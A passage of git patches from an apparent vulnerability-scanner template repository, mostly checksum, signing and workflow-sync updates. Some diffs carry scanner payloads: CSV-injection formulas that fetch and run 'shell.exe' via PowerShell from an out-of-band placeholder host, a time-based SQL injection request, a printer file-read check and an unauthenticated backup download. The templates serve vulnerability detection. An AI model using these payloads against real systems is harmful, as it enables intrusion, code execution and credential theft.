-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:2ad2d70f13ce4a2850c0c2208a08cbdd8547d28e +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:eb9ee3cff46124f620f8288c5c4491dbb4feee66 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:3217a7c88d433924a7b0635ef4f1cebcb6f03ab7 +http/technologies/wordpress/plugins/under-construction-page.yaml:bd0f2117939877e506277c0f540903159c880ed4 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa +http/technologies/wordpress/plugins/updraftplus.yaml:16ac983fe5152c13bb9680addb4b4beb402b78ad http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:c97ce21cadc041711ef3b7182a579c7ff36c3d53 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:92e453f2e4988d41981b02f39408d08a561d2a69 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:39e765f90355b97ba3a4b55584bf37f8fdff2ae3 +http/technologies/wordpress/plugins/webp-express.yaml:45d0bad812b446007edb72dec27e2cb63acbba5c +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:87a5e66bd3ea971996b55287ff7d52ddddf25fe0 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:dbf033b5e2edabfd135218fdeb551b7425ca589b +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:2e9a4d9aa64eb205fc55e129ea9209ace4835ef3 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:bd669d3e7d415282d59d5da6b57fd081eaeabff4 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:fcecf1e56de6ca51b968d505b7fa9d59e5185f19 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:80f79bdae355384502bfb239ea75c0ab90ff27e9 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:e9e826e19c2f4e9df25b260203cf6adb775682ee +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:347a6eab0a8da0724720f67698414cc91d5efd0a +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:3ad39431e197c6463be83e261f8374a9d6e40496 +http/technologies/wordpress/plugins/woocommerce-services.yaml:4db694649c2360857c425da3d1e3f1d38c783b69 +http/technologies/wordpress/plugins/woocommerce.yaml:aa5bb7af6ee865afa2e361c6d3bc5417df515f80 +http/technologies/wordpress/plugins/wordfence.yaml:9da54ca12d85a3199f30a50acfea80c228d4a1e1 +http/technologies/wordpress/plugins/wordpress-importer.yaml:ca0785c9870374d29796eb1d13b917a1415253d4 +http/technologies/wordpress/plugins/wordpress-seo.yaml:a1ae5339facbae16a1ddefea8c3a95ffbf935deb http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:1b73f7361a2c425f66460db5d743a0da482f8a23 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2f594a17dc79736211922ac969cc1fc7b191feef +http/technologies/wordpress/plugins/wp-file-manager.yaml:97a6ea70c57e86263c77c0ec2d306df985dc0c24 +http/technologies/wordpress/plugins/wp-google-maps.yaml:a6017fccad37306ed59c6289c5fa1cc14694141b +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:958a01db0596ae9e082b20563a70402f80bd88c3 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:16631fc310eb49f07717cfdfb4d5779353a8e8ab +http/technologies/wordpress/plugins/wp-migrate-db.yaml:a49c6dc62f7921e688b94b9349f53a00b0eb84fb +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:8553cbb6dc173aa23ab7c66c5b7cc7c01e9a2a72 +http/technologies/wordpress/plugins/wp-optimize.yaml:44e3b78001bca258cceae6fefa43fcc497f9dd65 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:751654fa66ce43e3d56c4aa7d17d496e0a572aea +http/technologies/wordpress/plugins/wp-reset.yaml:b5e70e76a20b336a0c726b712663031567c44f89 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4aa1b87212c5c5a62e42865b5c04e71c9c6e70f5 +http/technologies/wordpress/plugins/wp-rollback.yaml:43bd057ac6bf5b86f19977987f3547342503112e +http/technologies/wordpress/plugins/wp-seopress.yaml:90902654b3e7cabf05fe727b666e4a3cd321082f +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a47a99f08108d71871a3db71349f0b427de7f9b8 +http/technologies/wordpress/plugins/wp-smushit.yaml:903d6173bdb065b79502cd58ebcefc285937af6b +http/technologies/wordpress/plugins/wp-statistics.yaml:08e854896f0158b98df9ae6585311865b3c825b5 +http/technologies/wordpress/plugins/wp-super-cache.yaml:b21b40d2aa0ac8bacf3f439aa3ea263c763a2679 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:adbdb28ddc66c44681be8255729aa871831f2b53 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:8be5cbfeea44db32bfdbb892a8c0d46ea17ab67c +http/technologies/wordpress/plugins/wpforms-lite.yaml:594346cd95df7451b087c15e0ae4e110c6acb5bb +http/technologies/wordpress/plugins/wps-hide-login.yaml:65ef5901915bc82cc9969933ee3c5d9e06d5ad1e +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:4f17de7ffeedd6782808110ffcb451df575d2797 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:9ef82570a54440e945df26cf28c32f4ee5ab1300 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8819,7 +8820,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f35214b6bd46c1d865f507db1c94db592d293f85 +templates-checksum.txt:2f5b478f39b6435a734423847b5302481a6ac4e0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 046b7a857d598e0d1d55d805de7e269b2b2a97b2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 10:37:20 +0000 Subject: [PATCH 0823/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 20d19fe9e0..f010574b7b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,8 @@ on: push: paths: - '.new-additions' + - 'dast/vulnerabilities/xinclude-injection.yaml' + - 'http/cves/2023/CVE-2023-3380.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-27292.yaml' From 8fdf72886c6fff93d2e9ec30aa6fea4f44fc87eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 10:38:25 +0000 Subject: [PATCH 0824/1841] Auto Template Signing [Wed Jul 3 10:38:25 UTC 2024] :robot: --- dast/vulnerabilities/xinclude-injection.yaml | 1 + http/cves/2023/CVE-2023-3380.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/dast/vulnerabilities/xinclude-injection.yaml b/dast/vulnerabilities/xinclude-injection.yaml index 8a58114fce..40a1570071 100644 --- a/dast/vulnerabilities/xinclude-injection.yaml +++ b/dast/vulnerabilities/xinclude-injection.yaml @@ -42,3 +42,4 @@ http: part: body words: - 'for 16-bit app support' +# digest: 4a0a00473045022100b25c0306168fca549236f8877534a9ddbe228206ed95ba92039127e97f89c1d002207fb795beea65540ff515e458f9ccffe699c4293e15a188b9391acce754242356:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3380.yaml b/http/cves/2023/CVE-2023-3380.yaml index 506f1a8eb0..072919787b 100644 --- a/http/cves/2023/CVE-2023-3380.yaml +++ b/http/cves/2023/CVE-2023-3380.yaml @@ -59,3 +59,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100be619f43d5ece6eb354358b4e2b33fa9a6caca6802adf62d685ab48171ebc1c7022100af1ecda3534437a6f4c1cdd7c8045a977140ae8059c061d71f15e68b6d489268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8adbcc33754de6c3cb8d612a3e111ec8a6439e66 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:33:34 +0530 Subject: [PATCH 0825/1841] minor update --- dast/vulnerabilities/csv-injection.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml index ef78742b57..318d38f438 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/csv-injection.yaml @@ -22,7 +22,6 @@ http: - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0" - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'" - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0" - - "=cmd|'/c rundll32.exe \\{{interactsh-url}}\3\2\1.dll,0'!_xlbgnm.A1" - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' From cebc8c3268c651511f484640a41995acdb74701b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Jul 2024 16:36:17 +0530 Subject: [PATCH 0826/1841] trail space fix --- dast/vulnerabilities/csv-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/csv-injection.yaml index 318d38f438..e0fb0f2e30 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/csv-injection.yaml @@ -25,7 +25,7 @@ http: - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' - - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' + - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' fuzzing: - part: query From 6cee1b17f30c1bc0d76fe852404042a570a6e43c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 3 Jul 2024 17:23:43 +0530 Subject: [PATCH 0827/1841] Update and rename sharp-multi-function-printers-local-file-disclosure.yaml to sharp-printers-lfi.yaml --- ...al-file-disclosure.yaml => sharp-printers-lfi.yaml} | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) rename http/vulnerabilities/other/{sharp-multi-function-printers-local-file-disclosure.yaml => sharp-printers-lfi.yaml} (81%) diff --git a/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml b/http/vulnerabilities/other/sharp-printers-lfi.yaml similarity index 81% rename from http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml rename to http/vulnerabilities/other/sharp-printers-lfi.yaml index 94a6c69194..ca035a94e7 100644 --- a/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml +++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml @@ -1,4 +1,4 @@ -id: sharp-multi-function-printers-local-file-disclosure +id: sharp-printers-lfi info: name: Sharp Multifunction Printers - Local File Inclusion @@ -6,7 +6,8 @@ info: severity: high description: | It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer. - remediation: Apply all relevant security patches and product upgrades. + remediation: | + Apply all relevant security patches and product upgrades. reference: - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi - https://jvn.jp/en/vu/JVNVU93051062/index.html @@ -29,6 +30,11 @@ http: regex: - "root:.*:0:0:" + - type: word + part: header + words: + - "application/octet-stream; name=passwd" + - type: status status: - 200 From a0eb0680e616b96198aa2601ef35ada93e986947 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 12:05:11 +0000 Subject: [PATCH 0828/1841] Auto Generated New Template Addition List [Wed Jul 3 12:05:11 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 19e02e9967..0a61ba7da4 100644 --- a/.new-additions +++ b/.new-additions @@ -29,3 +29,4 @@ http/technologies/wordpress/plugins/chaty.yaml http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml http/vulnerabilities/other/bagisto-csti.yaml +http/vulnerabilities/other/sharp-printers-lfi.yaml From 964c3f53ecff0de5c779c0c2280ea7e90f009ff2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 12:05:18 +0000 Subject: [PATCH 0829/1841] Auto Generated Templates Checksum [Wed Jul 3 12:05:18 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6e0672ff97..39d86811ff 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -244,7 +244,7 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a4 dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 -dast/vulnerabilities/xinclude-injection.yaml:c2c6be46e7fe616aa21e5ffc06668c91babbe2e5 +dast/vulnerabilities/xinclude-injection.yaml:ae3c55714404e98d88a1ce452e9ca890e92b9c98 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a @@ -3157,7 +3157,7 @@ http/cves/2023/CVE-2023-33510.yaml:6db13769fa328f1cf80d6f5fb6adcdc9b8f1f53a http/cves/2023/CVE-2023-33568.yaml:785724178bb0f9cbb97d985c085d3d038efa75e9 http/cves/2023/CVE-2023-33629.yaml:50b5034e3cc19561694c3aa213d4c0d53013b6cf http/cves/2023/CVE-2023-3368.yaml:a8ff1548e219ee4de8587c1b1f37207efcdbb22d -http/cves/2023/CVE-2023-3380.yaml:82e29c1bd9589c15a6a70e8d244465c65ef39a7c +http/cves/2023/CVE-2023-3380.yaml:27eed9ea25641bf3a88a2e42fcda83709f6e8aaf http/cves/2023/CVE-2023-33831.yaml:e6d20c47f0fdd4c0d5fdfc162920edfa3a997ff4 http/cves/2023/CVE-2023-34020.yaml:8099d3e12f8a10e2d96d8bd1dc9161f04f821fb1 http/cves/2023/CVE-2023-34124.yaml:73042d74ae02e14a69bbc74952d41b3dc4aacc5e @@ -8155,6 +8155,7 @@ http/vulnerabilities/other/seacms-sqli.yaml:f2557fadc41230032cfad7aaa8143a270e0f http/vulnerabilities/other/seeyon-oa-log4j.yaml:96f97842102b78c5e0b1d69b837f21d229fc9e0e http/vulnerabilities/other/seowon-router-rce.yaml:d3f88b5db457f82269d3a12ae90a5d3b840b9737 http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:fe8c27aed21831daadcca8c21e29c66941fd661a +http/vulnerabilities/other/sharp-printers-lfi.yaml:31380809dfb04443a00207f04535b168d58fe5da http/vulnerabilities/other/shoowbiz-xss.yaml:05930d6afad56df16826196777333587acf80310 http/vulnerabilities/other/sick-beard-xss.yaml:eb652b90fdac36a07eb3b58a37005befbdaa2585 http/vulnerabilities/other/sitemap-sql-injection.yaml:2b3ec87344ddfb723073b534383371158cf06904 @@ -8820,7 +8821,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2f5b478f39b6435a734423847b5302481a6ac4e0 +templates-checksum.txt:41c1ab714cb8c608872d318539b2a97b38d5b048 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 200ea8a6e38fe9286fe66fb679637e6e1d04bd4a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 3 Jul 2024 12:05:59 +0000 Subject: [PATCH 0830/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f010574b7b..dd71d004e1 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -34,6 +34,7 @@ on: - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - 'http/vulnerabilities/other/bagisto-csti.yaml' + - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From da709ca2662e16c0c108a284a4f8184f7ecbb5c5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 12:07:08 +0000 Subject: [PATCH 0831/1841] Auto Template Signing [Wed Jul 3 12:07:08 UTC 2024] :robot: --- http/vulnerabilities/other/sharp-printers-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/other/sharp-printers-lfi.yaml b/http/vulnerabilities/other/sharp-printers-lfi.yaml index ca035a94e7..a618833424 100644 --- a/http/vulnerabilities/other/sharp-printers-lfi.yaml +++ b/http/vulnerabilities/other/sharp-printers-lfi.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100878bae1080c18655ce87b467103626ced8e1c8913101dcd255d13bdbe6416ed702200ff98fbdf4ae214323dc5b259c6e40f09345f7bd46605528276bb867c228ed48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4f6d4143764258d6eef3333d0a8bfe6ec793f787 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 3 Jul 2024 19:59:47 +0530 Subject: [PATCH 0832/1841] Create subrion-installer.yaml --- .../installer/subrion-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/subrion-installer.yaml diff --git a/http/misconfiguration/installer/subrion-installer.yaml b/http/misconfiguration/installer/subrion-installer.yaml new file mode 100644 index 0000000000..08ab013dc1 --- /dev/null +++ b/http/misconfiguration/installer/subrion-installer.yaml @@ -0,0 +1,33 @@ +id: subrion-installer + +info: + name: Subrion CMS Web Installer - Exposure + author: ritikchaddha + severity: high + description: | + Subrion CMS Web Installer has been exposed. + reference: + - https://github.com/intelliants/subrion + metadata: + verified: true + max-request: 1 + fofa-query: title="Subrion CMS Web Installer" + tags: subrion,cms,install,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Subrion CMS Web Installer" + - "Installation wizard" + condition: and + + - type: status + status: + - 200 From aa31bae34de040adb586b902c3bb5a91b29a5e14 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 3 Jul 2024 20:14:55 +0300 Subject: [PATCH 0833/1841] add azon dominator sqli --- .../other/azon-dominator-sqli.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/vulnerabilities/other/azon-dominator-sqli.yaml diff --git a/http/vulnerabilities/other/azon-dominator-sqli.yaml b/http/vulnerabilities/other/azon-dominator-sqli.yaml new file mode 100644 index 0000000000..762a57bb0d --- /dev/null +++ b/http/vulnerabilities/other/azon-dominator-sqli.yaml @@ -0,0 +1,33 @@ +id: azon-dominator-sqli + +info: + name: Azon Dominator - SQL Injection + author: securityforeveryone + severity: high + description: Azon Dominator software is vulnerable to a sql attack at /fetch_products.php. + reference: + - https://www.exploit-db.com/exploits/52059 + - https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script + metadata: + verified: "true" + max-request: 1 + fofa-query: "Azon Dominator" + tags: azon-dominator,affiliate-marketing-script,sqli + +http: + - raw: + - | + @timeout 20sn + POST /fetch_products.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112 + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"id","name")' + - 'duration>=6' + - 'status_code==500' + condition: and From 825578fe0afefc6f6d657bd32e8a0525998debc0 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 3 Jul 2024 21:09:15 +0300 Subject: [PATCH 0834/1841] add CVE-2024-5947 --- http/cves/2024/CVE-2024-5947.yaml | 38 +++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2024/CVE-2024-5947.yaml diff --git a/http/cves/2024/CVE-2024-5947.yaml b/http/cves/2024/CVE-2024-5947.yaml new file mode 100644 index 0000000000..f56b306885 --- /dev/null +++ b/http/cves/2024/CVE-2024-5947.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-5947 + +info: + name: Deep Sea Electronics DSE855 Remote Authentication Bypass + author: securityforeveryone + severity: medium + description: | + Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5947 + - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html + - https://www.zerodayinitiative.com/advisories/ZDI-24-671/ + metadata: + verified: "true" + max-request: 1 + fofa-query: "Deep Sea Electronics" + vendor: Deep Sea Electronics + product: DSE855 + tags: cve,cve2024,bypass,info-leak + +http: + - raw: + - | + GET HTTP/1.1 + Host: {{Hostname}} + + - | + GET /Backup.bin HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"Copyright Deep Sea Electronics")' + - 'status_code_1 == 200' + - 'contains(content_type_2,"Unknown")' + - 'status_code_2 == 200' + condition: and From 6c77faf0a5e56414402b8af94a861339ee5854f9 Mon Sep 17 00:00:00 2001 From: pussycat0x 